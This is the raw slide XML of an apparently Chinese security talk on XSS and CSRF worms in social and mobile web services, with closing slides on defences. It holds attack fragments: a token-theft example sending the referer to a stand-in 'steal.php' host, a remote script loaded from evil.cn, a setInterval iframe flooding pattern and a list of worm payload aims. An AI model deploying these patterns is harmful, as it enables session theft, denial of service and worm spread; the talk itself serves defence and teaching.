          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先修补漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS,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zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>完善的举报功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>总有些用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>户会参与举报</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>即时的公告提醒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让你的用户知道发生了什么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让他们觉得你重视用户隐私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5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Mobile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iphone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, android, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>symbian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, blackberry,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Mobile,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 mini, safari, IE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ucweb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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面渲染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WML(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>WMLScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>), HTML(JavaScript),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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>身份认证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cookie</a:t>
            </a:r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 smtClean="0"/>
              <a:t> authentication token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>其它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否支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>flash</a:t>
            </a:r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否支持离线存储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localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, local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7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危险的身份认证方式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 smtClean="0"/>
              <a:t> authentication token</a:t>
            </a:r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次登录生成一个唯一的不可预测的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>authentication token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>附加在每个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如何盗取用户身份认证？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referer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 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://hackomega.com/steal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> /&gt;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使用更安全的认证方式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cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点：有些手机浏览器不支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>否则</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>滤吧，一切可以带出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html tags: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/a/area/…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> styles: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>background:url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()/@import/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-binding/…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SNS Virus/Worm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05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>myspace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err="1" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>samy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err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>09</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>年接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>连发威</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>次的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>twitter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>国内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>这三年出现的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> worm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="到百度空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8240" y="4267916"/>
            <a:ext cx="1304925" cy="438151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133" y="5957729"/>
            <a:ext cx="1071570" cy="58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 descr="海内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5293888"/>
            <a:ext cx="1914525" cy="361951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="饭否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3655575"/>
            <a:ext cx="1790700" cy="419101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65308" y="3510674"/>
            <a:ext cx="1500198" cy="62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6056" y="5793545"/>
            <a:ext cx="1143008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8" descr="开心网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4941168"/>
            <a:ext cx="1009650" cy="342901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 25" descr="http://www.haokanbu.com/static/img/logo.gif?ver=6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1560" y="4150882"/>
            <a:ext cx="1504950" cy="790576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 27" descr="译言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22540" y="6021288"/>
            <a:ext cx="2381250" cy="600076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 32" descr="知道创宇内部交流平台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08104" y="3512699"/>
            <a:ext cx="1257300" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 36" descr="博客大巴 - BlogBus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96136" y="4941458"/>
            <a:ext cx="1762125" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 38" descr="http://blogimg.sinajs.cn/v5images/sinalogo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14612" y="4221088"/>
            <a:ext cx="933450" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 40" descr="http://mimg.126.com/logo/126logo_tsp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32040" y="5584401"/>
            <a:ext cx="1381125" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 42" descr="QQ邮箱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1645" y="5085184"/>
            <a:ext cx="1762123" cy="491756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 4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571736" y="4653136"/>
            <a:ext cx="1285884" cy="38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65167"/>
            <a:ext cx="20955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8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实现技术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XSS, CSRF,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smtClean="0"/>
              <a:t>PC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Virus/Worm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潜伏、后门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盗号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(MSN, Web Game)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、盗取隐私信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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与外域通信、接收控制端指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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我繁殖、自我删除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>擅于利</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用当前环境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保证原生态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1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潜伏模式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00500" y="5454923"/>
            <a:ext cx="4386263" cy="10715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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie/flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>local 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 virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>codz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shellcode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14438" y="3513410"/>
            <a:ext cx="1857375" cy="10128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/>
              <a:t>xss exploit(attacker page)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="圆角矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="1811610"/>
            <a:ext cx="2857500" cy="7143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remote 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 virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>codz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shellcode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57813" y="3526110"/>
            <a:ext cx="1857375" cy="946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/>
              <a:t>victim page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250" y="4169048"/>
            <a:ext cx="221456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1880" y="3454673"/>
            <a:ext cx="1606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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interaction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7864" y="4156348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</a:rPr>
              <a:t>inject exploit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15616" y="5631631"/>
            <a:ext cx="207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70C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SNS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Web OS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4375" y="3026048"/>
            <a:ext cx="7786688" cy="3643312"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3869"/>
            </a:avLst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000750" y="4472260"/>
            <a:ext cx="1" cy="9826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91553" y="4740548"/>
            <a:ext cx="2292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</a:rPr>
              <a:t>inject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shellcode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5928519" y="4955654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86525" y="4740548"/>
            <a:ext cx="76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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load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744913" y="1954485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evil.cn/j.js</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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3071813" y="3881710"/>
            <a:ext cx="22145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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2130079" y="2518344"/>
            <a:ext cx="13047" cy="995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/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="15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自我繁殖模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 8" descr="C:\Documents and Settings\Administrator\桌面\welcome_page_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2863" y="3645150"/>
            <a:ext cx="5114925" cy="185737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547664" y="5500607"/>
            <a:ext cx="6480720" cy="6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XSS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WORM CONTROL CENTER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57620" y="4071847"/>
            <a:ext cx="17732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with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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trap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19854" y="2314493"/>
            <a:ext cx="895352" cy="542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user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62532" y="2314493"/>
            <a:ext cx="895352" cy="542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user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71868" y="2314493"/>
            <a:ext cx="895352" cy="542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user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214546" y="2314493"/>
            <a:ext cx="895352" cy="542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user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035" y="2388896"/>
            <a:ext cx="204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Authenticated:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 25"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7497788" y="2390693"/>
            <a:ext cx="152400" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="righ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  <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109898" y="2585947"/>
            <a:ext cx="4619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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4467220" y="2585947"/>
            <a:ext cx="4953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7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857884" y="2585947"/>
            <a:ext cx="4619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6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2456244" y="3063379"/>
            <a:ext cx="1607355" cy="119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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3545673" y="3331272"/>
            <a:ext cx="1214446" cy="266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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4705352" y="3366991"/>
            <a:ext cx="1214446" cy="1952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4214810" y="5000541"/>
            <a:ext cx="214314" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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5072066" y="4929103"/>
            <a:ext cx="214314" cy="509590"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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4938793"/>
            <a:ext cx="1957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receive data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12263" y="4991637"/>
            <a:ext cx="1608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send data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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5736" y="3478318"/>
            <a:ext cx="1998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interaction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6096" y="3478318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infection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5" name="曲线连接符 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4036215" y="940500"/>
            <a:ext cx="1588" cy="2747986"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 418575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9" idx="0"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5393537" y="940500"/>
            <a:ext cx="1588" cy="2747986"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3477060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0" idx="0"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4714876" y="261839"/>
            <a:ext cx="1588" cy="4105308"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3565643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623845" y="3066585"/>
            <a:ext cx="12715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same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>domain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29" name="直接箭头连接符 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5630892" y="2857401"/>
            <a:ext cx="1136638" cy="16073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DDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>: 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=http://targetsite.com/&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>request logout function while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>logining</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>delete user’s data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>get or post “delete function” to web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>web zombies – a cool idea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CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>etc…more you can think up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7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一、理解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SNS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Social Networking Services</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 8" descr="C:\Documents and Settings\Administrator\桌面\welcome_page_m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143248"/>
            <a:ext cx="5114925" cy="185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0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断其源头</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>补</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS, CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>业务逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分离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不同的业务逻辑不应该在同一域下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cosine.appspot.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>is better than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>appspot.com/cosine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关键功能使用验证码或密码二次认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>止短时间内多次提交</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经常大批量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post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完善的用户举报与日志功能</a:t>
            </a:r>
